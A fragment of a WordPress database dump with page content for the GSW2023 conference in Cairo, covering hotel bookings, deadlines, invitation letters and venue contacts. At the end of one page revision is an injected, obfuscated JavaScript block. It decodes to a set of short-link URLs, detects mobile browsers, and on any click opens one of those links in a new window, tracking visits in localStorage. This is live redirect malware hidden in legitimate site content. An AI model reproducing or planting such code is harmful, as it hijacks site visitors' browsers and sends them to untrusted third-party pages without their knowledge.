link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:26:27','2023-07-11 13:26:27','',3066,'https://gsw2023.com/?p=5010',0,'revision','',0),
(5012,1,'2023-07-18 22:04:41','2023-07-18 22:04:41','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a 